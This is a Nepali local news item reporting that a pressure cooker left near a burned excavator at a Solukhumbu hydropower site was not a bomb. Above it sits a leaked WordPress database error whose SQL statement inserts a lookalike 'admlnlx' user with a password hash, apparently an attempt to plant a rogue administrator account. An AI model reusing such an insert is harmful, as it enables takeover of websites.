WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCsMfxX/uQVEeCdA5dCM/yXG6iE0DQ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:19:00', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, २ असार, सोलुखुम्बु । सोलुदुधकुण्ड नगरपालिका–११ तिङलाको भदौरेमा सन्चालन भाईरहेको ८६ मेगावाटको सोलुखोला दुधकोशी हाइड्रोपाावरको परिसरमा राखिएको प्रेसर कुकर बम नभएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ ।
शनिबार राति स्काभेटरमा आगजनी गरेर नजिकै राखिएको प्रेसर कुकर सोमबार बिहान ९ बजेर १२ मिनेटमा नेपाली सेनाले निष्कृय पार्ने क्रममा बम नभएको पुष्टि गरेको छ । स्काभेटरमा आगजानी गर्ने समूहले त्रास फैलाउनका लागि मात्र प्रेसर कुकुर राखिएको प्रहरी नायव उपरिक्षक शालिग्राम शर्मा पौडेलले बताए ।
घटनाको जिम्मेवारी समेत कसैले नलिएको अवस्थामा अनुसन्धान चलिरहेको प्रहरीले जनाएको छ । आगजनीबाट हाईड्रोपावरको स्काभेटरको ईन्जिनमा क्षति पुगेको छ ।
sourse:himalfm